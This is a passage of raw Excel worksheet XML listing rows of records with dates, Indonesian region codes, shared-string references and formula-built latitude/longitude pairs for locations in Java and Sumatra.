        <v>1382</v>
      </c>
      <c r="H296" t="s">
        <v>26</v>
      </c>
      <c r="I296" t="s">
        <v>628</v>
      </c>
      <c r="J296" t="s">
        <v>1128</v>
      </c>
      <c r="L296" t="s">
        <v>1383</v>
      </c>
      <c r="M296">
        <v>3315020015</v>
      </c>
      <c r="N296">
        <v>3315020</v>
      </c>
      <c r="O296">
        <v>3315</v>
      </c>
      <c r="P296">
        <v>33</v>
      </c>
      <c r="Q296" t="s">
        <v>1384</v>
      </c>
      <c r="R296" t="s">
        <v>1385</v>
      </c>
      <c r="S296" t="s">
        <v>1386</v>
      </c>
      <c r="T296" t="s">
        <v>1134</v>
      </c>
      <c r="U296" s="5">
        <v>11077282</v>
      </c>
      <c r="V296" s="5" t="s">
        <v>14730</v>
      </c>
      <c r="W296" s="5">
        <v>-710064</v>
      </c>
      <c r="X296" t="s">
        <v>18539</v>
      </c>
      <c r="Y296" t="str">
        <f t="shared" si="4"/>
        <v>-7.10064,110.77282</v>
      </c>
    </row>
    <row r="297" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A297">
        <v>101889</v>
      </c>
      <c r="B297" s="1">
        <v>43838</v>
      </c>
      <c r="C297" s="2">
        <v>0.56291666666666662</v>
      </c>
      <c r="D297" t="s">
        <v>22</v>
      </c>
      <c r="E297" t="s">
        <v>23</v>
      </c>
      <c r="F297" t="s">
        <v>1387</v>
      </c>
      <c r="G297" t="s">
        <v>1388</v>
      </c>
      <c r="H297" t="s">
        <v>26</v>
      </c>
      <c r="I297" t="s">
        <v>1389</v>
      </c>
      <c r="J297" t="s">
        <v>1390</v>
      </c>
      <c r="M297">
        <v>3315010012</v>
      </c>
      <c r="N297">
        <v>3315010</v>
      </c>
      <c r="O297">
        <v>3315</v>
      </c>
      <c r="P297">
        <v>33</v>
      </c>
      <c r="Q297" t="s">
        <v>1391</v>
      </c>
      <c r="R297" t="s">
        <v>1392</v>
      </c>
      <c r="S297" t="s">
        <v>1386</v>
      </c>
      <c r="T297" t="s">
        <v>1134</v>
      </c>
      <c r="U297" s="5">
        <v>11067366</v>
      </c>
      <c r="V297" s="5" t="s">
        <v>14731</v>
      </c>
      <c r="W297" s="5">
        <v>-712569</v>
      </c>
      <c r="X297" t="s">
        <v>18540</v>
      </c>
      <c r="Y297" t="str">
        <f t="shared" si="4"/>
        <v>-7.12569,110.67366</v>
      </c>
    </row>
    <row r="298" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A298">
        <v>101890</v>
      </c>
      <c r="B298" s="1">
        <v>43838</v>
      </c>
      <c r="C298" s="2">
        <v>0.65865740740740741</v>
      </c>
      <c r="D298" t="s">
        <v>22</v>
      </c>
      <c r="E298" t="s">
        <v>23</v>
      </c>
      <c r="F298" t="s">
        <v>1393</v>
      </c>
      <c r="H298" t="s">
        <v>26</v>
      </c>
      <c r="I298" t="s">
        <v>1394</v>
      </c>
      <c r="J298" t="s">
        <v>1390</v>
      </c>
      <c r="L298" t="s">
        <v>1395</v>
      </c>
      <c r="M298">
        <v>3315170003</v>
      </c>
      <c r="N298">
        <v>3315170</v>
      </c>
      <c r="O298">
        <v>3315</v>
      </c>
      <c r="P298">
        <v>33</v>
      </c>
      <c r="Q298" t="s">
        <v>1396</v>
      </c>
      <c r="R298" t="s">
        <v>1397</v>
      </c>
      <c r="S298" t="s">
        <v>1386</v>
      </c>
      <c r="T298" t="s">
        <v>1134</v>
      </c>
      <c r="U298" s="5">
        <v>11069324</v>
      </c>
      <c r="V298" s="5" t="s">
        <v>14732</v>
      </c>
      <c r="W298" s="5">
        <v>-709186</v>
      </c>
      <c r="X298" t="s">
        <v>18541</v>
      </c>
      <c r="Y298" t="str">
        <f t="shared" si="4"/>
        <v>-7.09186,110.69324</v>
      </c>
    </row>
    <row r="299" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A299">
        <v>101891</v>
      </c>
      <c r="B299" s="1">
        <v>43838</v>
      </c>
      <c r="C299" s="2">
        <v>0.76923611111111112</v>
      </c>
      <c r="D299" t="s">
        <v>22</v>
      </c>
      <c r="E299" t="s">
        <v>23</v>
      </c>
      <c r="F299" t="s">
        <v>1398</v>
      </c>
      <c r="H299" t="s">
        <v>26</v>
      </c>
      <c r="I299" t="s">
        <v>1399</v>
      </c>
      <c r="J299" t="s">
        <v>1400</v>
      </c>
      <c r="L299" t="s">
        <v>1401</v>
      </c>
      <c r="M299">
        <v>3171080006</v>
      </c>
      <c r="N299">
        <v>3171080</v>
      </c>
      <c r="O299">
        <v>3171</v>
      </c>
      <c r="P299">
        <v>31</v>
      </c>
      <c r="Q299" t="s">
        <v>1402</v>
      </c>
      <c r="R299" t="s">
        <v>1403</v>
      </c>
      <c r="S299" t="s">
        <v>108</v>
      </c>
      <c r="T299" t="s">
        <v>33</v>
      </c>
      <c r="U299" s="5">
        <v>10685821</v>
      </c>
      <c r="V299" s="5" t="s">
        <v>14733</v>
      </c>
      <c r="W299" s="5">
        <v>-624466</v>
      </c>
      <c r="X299" t="s">
        <v>18542</v>
      </c>
      <c r="Y299" t="str">
        <f t="shared" si="4"/>
        <v>-6.24466,106.85821</v>
      </c>
    </row>
    <row r="300" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A300">
        <v>101892</v>
      </c>
      <c r="B300" s="1">
        <v>43838</v>
      </c>
      <c r="C300" s="2">
        <v>0.96841435185185187</v>
      </c>
      <c r="D300" t="s">
        <v>22</v>
      </c>
      <c r="E300" t="s">
        <v>23</v>
      </c>
      <c r="F300" t="s">
        <v>1404</v>
      </c>
      <c r="H300" t="s">
        <v>26</v>
      </c>
      <c r="I300" t="s">
        <v>517</v>
      </c>
      <c r="J300" t="s">
        <v>1342</v>
      </c>
      <c r="L300" t="s">
        <v>1405</v>
      </c>
      <c r="M300">
        <v>3525040017</v>
      </c>
      <c r="N300">
        <v>3525040</v>
      </c>
      <c r="O300">
        <v>3525</v>
      </c>
      <c r="P300">
        <v>35</v>
      </c>
      <c r="Q300" t="s">
        <v>1406</v>
      </c>
      <c r="R300" t="s">
        <v>1407</v>
      </c>
      <c r="S300" t="s">
        <v>1368</v>
      </c>
      <c r="T300" t="s">
        <v>1221</v>
      </c>
      <c r="U300" s="5">
        <v>11255836</v>
      </c>
      <c r="V300" s="5" t="s">
        <v>14734</v>
      </c>
      <c r="W300" s="5">
        <v>-725213</v>
      </c>
      <c r="X300" t="s">
        <v>18543</v>
      </c>
      <c r="Y300" t="str">
        <f t="shared" si="4"/>
        <v>-7.25213,112.55836</v>
      </c>
    </row>
    <row r="301" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A301">
        <v>101895</v>
      </c>
      <c r="B301" s="1">
        <v>43839</v>
      </c>
      <c r="C301" s="2">
        <v>0.3409490740740741</v>
      </c>
      <c r="D301" t="s">
        <v>22</v>
      </c>
      <c r="E301" t="s">
        <v>23</v>
      </c>
      <c r="F301" t="s">
        <v>1408</v>
      </c>
      <c r="G301" t="s">
        <v>1409</v>
      </c>
      <c r="H301" t="s">
        <v>26</v>
      </c>
      <c r="I301" t="s">
        <v>27</v>
      </c>
      <c r="J301" t="s">
        <v>1410</v>
      </c>
      <c r="M301">
        <v>3374090002</v>
      </c>
      <c r="N301">
        <v>3374090</v>
      </c>
      <c r="O301">
        <v>3374</v>
      </c>
      <c r="P301">
        <v>33</v>
      </c>
      <c r="Q301" t="s">
        <v>1411</v>
      </c>
      <c r="R301" t="s">
        <v>1362</v>
      </c>
      <c r="S301" t="s">
        <v>1334</v>
      </c>
      <c r="T301" t="s">
        <v>1134</v>
      </c>
      <c r="U301" s="5">
        <v>11046563</v>
      </c>
      <c r="V301" s="5" t="s">
        <v>14735</v>
      </c>
      <c r="W301" s="5">
        <v>-695615</v>
      </c>
      <c r="X301" t="s">
        <v>18544</v>
      </c>
      <c r="Y301" t="str">
        <f t="shared" si="4"/>
        <v>-6.95615,110.46563</v>
      </c>
    </row>
    <row r="302" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A302">
        <v>101896</v>
      </c>
      <c r="B302" s="1">
        <v>43839</v>
      </c>
      <c r="C302" s="2">
        <v>0.65393518518518523</v>
      </c>
      <c r="D302" t="s">
        <v>22</v>
      </c>
      <c r="E302" t="s">
        <v>23</v>
      </c>
      <c r="F302" t="s">
        <v>1412</v>
      </c>
      <c r="G302" t="s">
        <v>1413</v>
      </c>
      <c r="H302" t="s">
        <v>26</v>
      </c>
      <c r="I302" t="s">
        <v>1194</v>
      </c>
      <c r="J302" t="s">
        <v>1128</v>
      </c>
      <c r="L302" t="s">
        <v>1414</v>
      </c>
      <c r="M302">
        <v>1604132006</v>
      </c>
      <c r="N302">
        <v>1604132</v>
      </c>
      <c r="O302">
        <v>1604</v>
      </c>
      <c r="P302">
        <v>16</v>
      </c>
      <c r="Q302" t="s">
        <v>1415</v>
      </c>
      <c r="R302" t="s">
        <v>1416</v>
      </c>
      <c r="S302" t="s">
        <v>1417</v>
      </c>
      <c r="T302" t="s">
        <v>1418</v>
      </c>
      <c r="U302" s="5">
        <v>10371952</v>
      </c>
      <c r="V302" s="5" t="s">
        <v>14736</v>
      </c>
      <c r="W302" s="5">
        <v>-364608</v>
      </c>
      <c r="X302" t="s">
        <v>18545</v>
      </c>
      <c r="Y302" t="str">
        <f t="shared" si="4"/>
        <v>-3.64608,103.71952</v>
      </c>
    </row>
    <row r="303" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A303">
        <v>101898</v>
      </c>
      <c r="B303" s="1">
        <v>43841</v>
      </c>
      <c r="C303" s="2">
        <v>0.12895833333333334</v>
      </c>
      <c r="D303" t="s">
        <v>85</v>
      </c>
      <c r="E303" t="s">
        <v>23</v>
      </c>
      <c r="F303" t="s">
        <v>1419</v>
      </c>
      <c r="G303" t="s">
        <v>1420</v>
      </c>
      <c r="H303" t="s">
        <v>26</v>
      </c>
      <c r="J303" t="s">
        <v>1128</v>
      </c>
      <c r="K303" t="s">
        <v>1421</v>
      </c>
      <c r="L303" t="s">
        <v>1422</v>
      </c>
      <c r="M303">
        <v>3577030008</v>
      </c>
      <c r="N303">
        <v>3577030</v>
      </c>
      <c r="O303">
        <v>3577</v>
      </c>
      <c r="P303">
        <v>35</v>
      </c>
      <c r="Q303" t="s">
        <v>1218</v>
      </c>
      <c r="R303" t="s">
        <v>1219</v>
      </c>
      <c r="S303" t="s">
        <v>1220</v>
      </c>
      <c r="T303" t="s">
        <v>1221</v>
      </c>
      <c r="U303" s="5">
        <v>11153502</v>
      </c>
      <c r="V303" s="5" t="s">
        <v>14694</v>
      </c>
      <c r="W303" s="5">
        <v>-760912</v>
      </c>
      <c r="X303" t="s">
        <v>18505</v>
      </c>
      <c r="Y303" t="str">
        <f t="shared" si="4"/>
        <v>-7.60912,111.53502</v>
      </c>
    </row>
    <row r="304" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A304">
        <v>101899</v>
      </c>
      <c r="B304" s="1">
        <v>43841</v>
      </c>
      <c r="C304" s="2">
        <v>0.18063657407407407</v>
      </c>
      <c r="D304" t="s">
        <v>22</v>
      </c>
      <c r="E304" t="s">
        <v>23</v>
      </c>
      <c r="F304" t="s">
        <v>1423</v>
      </c>
      <c r="G304" t="s">
        <v>1424</v>
      </c>
      <c r="H304" t="s">
        <v>26</v>
      </c>
      <c r="I304" t="s">
        <v>517</v>
      </c>
      <c r="J304" t="s">
        <v>1390</v>
      </c>
      <c r="L304" t="s">
        <v>1425</v>
      </c>
      <c r="M304">
        <v>3321030015</v>
      </c>
      <c r="N304">
        <v>3321030</v>
      </c>
      <c r="O304">
        <v>3321</v>
      </c>
      <c r="P304">
        <v>33</v>
      </c>
      <c r="Q304" t="s">
        <v>1426</v>
      </c>
      <c r="R304" t="s">
        <v>1427</v>
      </c>
      <c r="S304" t="s">
        <v>1428</v>
      </c>
      <c r="T304" t="s">
        <v>1134</v>
      </c>
      <c r="U304" s="5">
        <v>11065954</v>
      </c>
      <c r="V304" s="5" t="s">
        <v>14737</v>
      </c>
      <c r="W304" s="5">
        <v>-696941</v>
      </c>
      <c r="X304" t="s">
        <v>18546</v>
      </c>
      <c r="Y304" t="str">
        <f t="shared" si="4"/>
        <v>-6.96941,110.65954</v>
      </c>
    </row>
    <row r="305" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A305">
        <v>101902</v>
      </c>
      <c r="B305" s="1">
        <v>43843</v>
      </c>
      <c r="C305" s="2">
        <v>0.14704861111111112</v>
      </c>
      <c r="D305" t="s">
        <v>22</v>
      </c>
      <c r="E305" t="s">
        <v>23</v>
      </c>
      <c r="F305" t="s">
        <v>1429</v>
      </c>
      <c r="G305" t="s">
        <v>1430</v>
      </c>
      <c r="H305" t="s">
        <v>26</v>
      </c>
      <c r="I305" t="s">
        <v>831</v>
      </c>
      <c r="J305" t="s">
        <v>586</v>
      </c>
      <c r="L305" t="s">
        <v>1431</v>
      </c>
      <c r="M305">
        <v>3173050002</v>
      </c>
      <c r="N305">
        <v>3173050</v>
      </c>
      <c r="O305">
        <v>3173</v>
      </c>
      <c r="P305">
        <v>31</v>
      </c>
      <c r="Q305" t="s">
        <v>588</v>
      </c>
      <c r="R305" t="s">
        <v>589</v>
      </c>
      <c r="S305" t="s">
        <v>62</v>
      </c>
      <c r="T305" t="s">
        <v>33</v>
      </c>
      <c r="U305" s="5">
        <v>10686539</v>
      </c>
      <c r="V305" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W305" s="5">
        <v>-617605</v>
      </c>
      <c r="X305" t="s">
        <v>18379</v>
      </c>
      <c r="Y305" t="str">
        <f t="shared" si="4"/>
        <v>-6.17605,106.86539</v>
      </c>
    </row>
    <row r="306" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A306">
        <v>101904</v>
      </c>
      <c r="B306" s="1">
        <v>43843</v>
      </c>
      <c r="C306" s="2">
        <v>0.1482175925925926</v>
      </c>
      <c r="D306" t="s">
        <v>22</v>
      </c>
      <c r="E306" t="s">
        <v>23</v>
      </c>
      <c r="F306" t="s">
        <v>1432</v>
      </c>
      <c r="H306" t="s">
        <v>26</v>
      </c>
      <c r="I306" t="s">
        <v>1433</v>
      </c>
      <c r="J306" t="s">
        <v>1434</v>
      </c>
      <c r="M306">
        <v>3172100006</v>
      </c>
      <c r="N306">
        <v>3172100</v>
      </c>
      <c r="O306">
        <v>3172</v>
      </c>
      <c r="P306">
        <v>31</v>
      </c>
      <c r="Q306" t="s">
        <v>1435</v>
      </c>
      <c r="R306" t="s">
        <v>1436</v>
      </c>
      <c r="S306" t="s">
        <v>49</v>
      </c>
      <c r="T306" t="s">
        <v>33</v>
      </c>
      <c r="U306" s="5">
        <v>10686707</v>
      </c>
      <c r="V306" s="5" t="s">
        <v>14738</v>
      </c>
      <c r="W306" s="5">
        <v>-619371</v>
      </c>
      <c r="X306" t="s">
        <v>18547</v>
      </c>
      <c r="Y306" t="str">
        <f t="shared" si="4"/>
        <v>-6.19371,106.86707</v>
      </c>
    </row>
    <row r="307" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A307">
        <v>101907</v>
      </c>
      <c r="B307" s="1">
        <v>43843</v>
      </c>
      <c r="C307" s="2">
        <v>0.14998842592592593</v>
      </c>
      <c r="D307" t="s">
        <v>22</v>
      </c>
      <c r="E307" t="s">
        <v>23</v>
      </c>
      <c r="F307" t="s">
        <v>1437</v>
      </c>
      <c r="G307" t="s">
        <v>1438</v>
      </c>
      <c r="H307" t="s">
        <v>26</v>
      </c>
      <c r="I307" t="s">
        <v>1439</v>
      </c>
      <c r="J307" t="s">
        <v>1440</v>
      </c>
      <c r="L307" t="s">
        <v>1441</v>
      </c>
      <c r="M307">
        <v>3172100006</v>
      </c>
      <c r="N307">
        <v>3172100</v>
      </c>
      <c r="O307">
        <v>3172</v>
      </c>
      <c r="P307">
        <v>31</v>
      </c>
      <c r="Q307" t="s">
        <v>1435</v>
      </c>
      <c r="R307" t="s">
        <v>1436</v>
      </c>
      <c r="S307" t="s">
        <v>49</v>
      </c>
      <c r="T307" t="s">
        <v>33</v>
      </c>
      <c r="U307" s="5">
        <v>10686870</v>
      </c>
      <c r="V307" s="5" t="s">
        <v>14739</v>
      </c>
      <c r="W307" s="5">
        <v>-619333</v>
      </c>
      <c r="X307" t="s">
        <v>18548</v>
      </c>
      <c r="Y307" t="str">
        <f t="shared" si="4"/>
        <v>-6.19333,106.86870</v>
      </c>
    </row>
    <row r="308" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A308">
        <v>101909</v>
      </c>
      <c r="B308" s="1">
        <v>43843</v>
      </c>
      <c r="C308" s="2">
        <v>0.15155092592592592</v>
      </c>
      <c r="D308" t="s">
        <v>22</v>
      </c>
      <c r="E308" t="s">
        <v>23</v>
      </c>
      <c r="F308" t="s">
        <v>1442</v>
      </c>
      <c r="G308" t="s">
        <v>1443</v>
      </c>
      <c r="H308" t="s">
        <v>26</v>
      </c>
      <c r="I308" t="s">
        <v>624</v>
      </c>
      <c r="J308" t="s">
        <v>1440</v>
      </c>
      <c r="L308" t="s">
        <v>1444</v>
      </c>
      <c r="M308">
        <v>3172100006</v>
      </c>
      <c r="N308">
        <v>3172100</v>
      </c>
      <c r="O308">
        <v>3172</v>
      </c>
      <c r="P308">
        <v>31</v>
      </c>
      <c r="Q308" t="s">
        <v>1435</v>
      </c>
      <c r="R308" t="s">
        <v>1436</v>
      </c>
      <c r="S308" t="s">
        <v>49</v>
      </c>
      <c r="T308" t="s">
        <v>33</v>
      </c>
      <c r="U308" s="5">
        <v>10686873</v>
      </c>
      <c r="V308" s="5" t="s">
        <v>14740</v>
      </c>
      <c r="W308" s="5">
        <v>-619338</v>
      </c>
      <c r="X308" t="s">
        <v>18549</v>
      </c>
      <c r="Y308" t="str">
        <f t="shared" si="4"/>
        <v>-6.19338,106.86873</v>
      </c>
    </row>
    <row r="309" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A309">
        <v>101910</v>
      </c>
      <c r="B309" s="1">
        <v>43843</v>
      </c>
      <c r="C309" s="2">
        <v>0.1519675925925926</v>
      </c>
      <c r="D309" t="s">
        <v>22</v>
      </c>
      <c r="E309" t="s">
        <v>23</v>
      </c>
      <c r="F309" s="3" t="s">
        <v>1445</v>
      </c>
      <c r="G309" t="s">
        <v>1446</v>
      </c>
      <c r="H309" t="s">
        <v>26</v>
      </c>
      <c r="I309" t="s">
        <v>1447</v>
      </c>
      <c r="J309" t="s">
        <v>1440</v>
      </c>
      <c r="L309" t="s">
        <v>1448</v>
      </c>
      <c r="M309">
        <v>3172100006</v>
      </c>
      <c r="N309">
        <v>3172100</v>
      </c>
      <c r="O309">
        <v>3172</v>
      </c>
      <c r="P309">
        <v>31</v>
      </c>
      <c r="Q309" t="s">
        <v>1435</v>
      </c>
      <c r="R309" t="s">
        <v>1436</v>
      </c>
      <c r="S309" t="s">
        <v>49</v>
      </c>
      <c r="T309" t="s">
        <v>33</v>
      </c>
      <c r="U309" s="5">
        <v>10686870</v>
      </c>
      <c r="V309" s="5" t="s">
        <v>14739</v>
      </c>
      <c r="W309" s="5">
        <v>-619333</v>
      </c>
      <c r="X309" t="s">
        <v>18548</v>
      </c>
      <c r="Y309" t="str">
        <f t="shared" si="4"/>
        <v>-6.19333,106.86870</v>
      </c>
    </row>
    <row r="310" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A310">
        <v>101912</v>
      </c>
      <c r="B310" s="1">
        <v>43844</v>
      </c>
      <c r="C310" s="2">
        <v>0.42119212962962965</v>
      </c>
      <c r="D310" t="s">
        <v>22</v>
      </c>
      <c r="E310" t="s">
        <v>23</v>
      </c>
      <c r="F310" t="s">
        <v>1449</v>
      </c>
      <c r="G310" t="s">
        <v>1450</v>
      </c>
      <c r="H310" t="s">
        <v>26</v>
      </c>
      <c r="I310" t="s">
        <v>517</v>
      </c>
      <c r="J310" t="s">
        <v>1390</v>
      </c>
      <c r="L310" t="s">
        <v>1451</v>
      </c>
      <c r="M310">
        <v>3321040016</v>
      </c>
      <c r="N310">
        <v>3321040</v>
      </c>
      <c r="O310">
        <v>3321</v>
      </c>
      <c r="P310">
        <v>33</v>
      </c>
      <c r="Q310" t="s">
        <v>1452</v>
      </c>
      <c r="R310" t="s">
        <v>1453</v>
      </c>
      <c r="S310" t="s">
        <v>1428</v>
      </c>
      <c r="T310" t="s">
        <v>1134</v>
      </c>
      <c r="U310" s="5">
        <v>11050670</v>
      </c>
      <c r="V310" s="5" t="s">
        <v>14741</v>
      </c>
      <c r="W310" s="5">
        <v>-690308</v>
      </c>
      <c r="X310" t="s">
        <v>18550</v>
      </c>
      <c r="Y310" t="str">
        <f t="shared" si="4"/>
        <v>-6.90308,110.50670</v>
      </c>
    </row>
    <row r="311" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A311">
        <v>101913</v>
      </c>
      <c r="B311" s="1">
        <v>43844</v>
      </c>
      <c r="C311" s="2">
        <v>0.49866898148148148</v>
      </c>
      <c r="D311" t="s">
        <v>22</v>
      </c>
      <c r="E311" t="s">
        <v>23</v>
      </c>
      <c r="F311" t="s">
        <v>1454</v>
      </c>
      <c r="G311" t="s">
        <v>1455</v>
      </c>
      <c r="H311" t="s">
        <v>26</v>
      </c>
      <c r="I311" t="s">
        <v>867</v>
      </c>
      <c r="J311" t="s">
        <v>586</v>
      </c>
      <c r="L311" t="s">
        <v>1456</v>
      </c>
      <c r="M311">
        <v>3173050002</v>
      </c>
      <c r="N311">
        <v>3173050</v>
      </c>
      <c r="O311">
        <v>3173</v>
      </c>
      <c r="P311">
        <v>31</v>
      </c>
      <c r="Q311" t="s">
        <v>588</v>
      </c>
      <c r="R311" t="s">
        <v>589</v>
      </c>
      <c r="S311" t="s">
        <v>62</v>
      </c>
      <c r="T311" t="s">
        <v>33</v>
      </c>
      <c r="U311" s="5">
        <v>10686539</v>
      </c>
      <c r="V311" s="5" t="s">
        <v>14555</v>
      </c>
      <c r="W311" s="5">
        <v>-617469</v>
      </c>
      <c r="X311" t="s">
        <v>18368</v>
      </c>
      <c r="Y311" t="str">
        <f t="shared" si="4"/>
        <v>-6.17469,106.86539</v>
      </c>
    </row>
    <row r="312" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A312">
        <v>101914</v>
      </c>
      <c r="B312" s="1">
        <v>43844</v>
      </c>
      <c r="C312" s="2">
        <v>0.64965277777777775</v>
      </c>
      <c r="D312" t="s">
        <v>22</v>
      </c>
      <c r="E312" t="s">
        <v>23</v>
      </c>
      <c r="F312" t="s">
        <v>1457</v>
      </c>
      <c r="H312" t="s">
        <v>26</v>
      </c>
      <c r="I312" t="s">
        <v>1046</v>
      </c>
      <c r="J312" t="s">
        <v>1458</v>
      </c>
      <c r="M312">
        <v>3172050005</v>
      </c>
      <c r="N312">
        <v>3172050</v>
      </c>
      <c r="O312">
        <v>3172</v>
      </c>
      <c r="P312">
        <v>31</v>
      </c>
      <c r="Q312" t="s">
        <v>358</v>
      </c>
      <c r="R312" t="s">
        <v>358</v>
      </c>
      <c r="S312" t="s">
        <v>49</v>
      </c>
      <c r="T312" t="s">
        <v>33</v>
      </c>
      <c r="U312" s="5">
        <v>10687208</v>
      </c>
      <c r="V312" s="5" t="s">
        <v>14742</v>
      </c>
      <c r="W312" s="5">
        <v>-627344</v>
      </c>
      <c r="X312" t="s">
        <v>18551</v>
      </c>
      <c r="Y312" t="str">
        <f t="shared" si="4"/>
        <v>-6.27344,106.87208</v>
      </c>
    </row>
    <row r="313" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A313">
        <v>101919</v>
      </c>
      <c r="B313" s="1">
        <v>43847</v>
      </c>
      <c r="C313" s="2">
        <v>0.40517361111111111</v>
      </c>
      <c r="D313" t="s">
        <v>22</v>
      </c>
      <c r="E313" t="s">
        <v>23</v>
      </c>
      <c r="F313" t="s">
        <v>1459</v>
      </c>
      <c r="H313" t="s">
        <v>26</v>
      </c>
      <c r="I313" t="s">
        <v>1359</v>
      </c>
      <c r="J313" t="s">
        <v>1460</v>
      </c>
      <c r="L313" t="s">
        <v>1461</v>
      </c>
      <c r="M313">
        <v>3273100002</v>
      </c>
      <c r="N313">
        <v>3273100</v>
      </c>
      <c r="O313">
        <v>3273</v>
      </c>
      <c r="P313">
        <v>32</v>
      </c>
      <c r="Q313" t="s">
        <v>1462</v>
      </c>
      <c r="R313" t="s">
        <v>1463</v>
      </c>
      <c r="S313" t="s">
        <v>1464</v>
      </c>
      <c r="T313" t="s">
        <v>42</v>
      </c>
      <c r="U313" s="5">
        <v>10767473</v>
      </c>
      <c r="V313" s="5" t="s">
        <v>14743</v>
      </c>
      <c r="W313" s="5">
        <v>-694644</v>
      </c>
      <c r="X313" t="s">
        <v>18552</v>
      </c>
      <c r="Y313" t="str">
        <f t="shared" si="4"/>
        <v>-6.94644,107.67473</v>
      </c>
    </row>
    <row r="314" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A314">
        <v>101920</v>
      </c>
      <c r="B314" s="1">
        <v>43847</v>
      </c>
      <c r="C314" s="2">
        <v>0.4306828703703704</v>
      </c>
      <c r="D314" t="s">
        <v>22</v>
      </c>
      <c r="E314" t="s">
        <v>23</v>
      </c>
      <c r="F314" t="s">
        <v>1465</v>
      </c>
      <c r="G314" t="s">
        <v>1466</v>
      </c>
      <c r="H314" t="s">
        <v>26</v>
      </c>
      <c r="I314" t="s">
        <v>166</v>
      </c>
      <c r="J314" t="s">
        <v>1460</v>
      </c>
      <c r="M314">
        <v>3273090002</v>
      </c>
      <c r="N314">
        <v>3273090</v>
      </c>
      <c r="O314">
        <v>3273</v>
      </c>
      <c r="P314">
        <v>32</v>
      </c>
      <c r="Q314" t="s">
        <v>1467</v>
      </c>
      <c r="R314" t="s">
        <v>1468</v>
      </c>
      <c r="S314" t="s">
        <v>1464</v>
      </c>
      <c r="T314" t="s">
        <v>42</v>
      </c>
      <c r="U314" s="5">
        <v>10766007</v>
      </c>
      <c r="V314" s="5" t="s">
        <v>14744</v>
      </c>
      <c r="W314" s="5">
        <v>-695782</v>
      </c>
      <c r="X314" t="s">
        <v>18553</v>
      </c>
      <c r="Y314" t="str">
        <f t="shared" si="4"/>
        <v>-6.95782,107.66007</v>
      </c>
    </row>
    <row r="315" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A315">
        <v>101921</v>
      </c>
      <c r="B315" s="1">
        <v>43847</v>
      </c>
      <c r="C315" s="2">
        <v>0.96629629629629632</v>
      </c>
      <c r="D315" t="s">
        <v>85</v>
      </c>
      <c r="E315" t="s">
        <v>23</v>
      </c>
      <c r="F315" t="s">
        <v>1469</v>
      </c>
      <c r="G315" t="s">
        <v>1470</v>
      </c>
      <c r="H315" t="s">
        <v>26</v>
      </c>
      <c r="J315" t="s">
        <v>1471</v>
      </c>
      <c r="K315" t="s">
        <v>1472</v>
      </c>
      <c r="L315" t="s">
        <v>1473</v>
      </c>
      <c r="M315">
        <v>3171100001</v>
      </c>
      <c r="N315">
        <v>3171100</v>
      </c>
      <c r="O315">
        <v>3171</v>
      </c>
      <c r="P315">
        <v>31</v>
      </c>
      <c r="Q315" t="s">
        <v>1474</v>
      </c>
      <c r="R315" t="s">
        <v>107</v>
      </c>
      <c r="S315" t="s">
        <v>108</v>
      </c>
      <c r="T315" t="s">
        <v>33</v>
      </c>
      <c r="U315" s="5">
        <v>10681951</v>
      </c>
      <c r="V315" s="5" t="s">
        <v>14745</v>
      </c>
      <c r="W315" s="5">
        <v>-621940</v>
      </c>
      <c r="X315" t="s">
        <v>18554</v>
      </c>
      <c r="Y315" t="str">
        <f t="shared" si="4"/>
        <v>-6.21940,106.81951</v>
      </c>
    </row>
    <row r="316" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A316">
        <v>101922</v>
      </c>
      <c r="B316" s="1">
        <v>43847</v>
      </c>
      <c r="C316" s="2">
        <v>0.9911226851851852</v>
      </c>
      <c r="D316" t="s">
        <v>22</v>
      </c>
      <c r="E316" t="s">
        <v>23</v>
      </c>
      <c r="F316" t="s">
        <v>1475</v>
      </c>
      <c r="G316" t="s">
        <v>1476</v>
      </c>
      <c r="H316" t="s">
        <v>26</v>
      </c>
      <c r="I316" t="s">
        <v>1477</v>
      </c>
      <c r="J316" t="s">
        <v>1478</v>
      </c>
      <c r="L316" t="s">
        <v>1479</v>
      </c>
      <c r="M316">
        <v>3173010001</v>
      </c>
      <c r="N316">
        <v>3173010</v>
      </c>
      <c r="O316">
        <v>3173</v>
      </c>
      <c r="P316">
        <v>31</v>
      </c>
      <c r="Q316" t="s">
        <v>1480</v>
      </c>
      <c r="R316" t="s">
        <v>1481</v>
      </c>
      <c r="S316" t="s">
        <v>62</v>
      </c>
      <c r="T316" t="s">
        <v>33</v>
      </c>
      <c r="U316" s="5">
        <v>10679589</v>
      </c>
      <c r="V316" s="5" t="s">
        <v>14746</v>
      </c>
      <c r="W316" s="5">
        <v>-622847</v>
      </c>
      <c r="X316" t="s">
        <v>18555</v>
      </c>
      <c r="Y316" t="str">
        <f t="shared" si="4"/>
        <v>-6.22847,106.79589</v>
      </c>
    </row>
    <row r="317" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A317">
        <v>101923</v>
      </c>
      <c r="B317" s="1">
        <v>43847</v>
      </c>
      <c r="C317" s="2">
        <v>0.99824074074074076</v>
      </c>
      <c r="D317" t="s">
        <v>22</v>
      </c>
      <c r="E317" t="s">
        <v>23</v>
      </c>
      <c r="F317" t="s">
        <v>1482</v>
      </c>
      <c r="G317" t="s">
        <v>1483</v>
      </c>
      <c r="H317" t="s">
        <v>26</v>
      </c>
      <c r="I317" t="s">
        <v>1194</v>
      </c>
      <c r="J317" t="s">
        <v>1484</v>
      </c>
      <c r="L317" t="s">
        <v>1485</v>
      </c>
      <c r="M317">
        <v>3174030003</v>
      </c>
      <c r="N317">
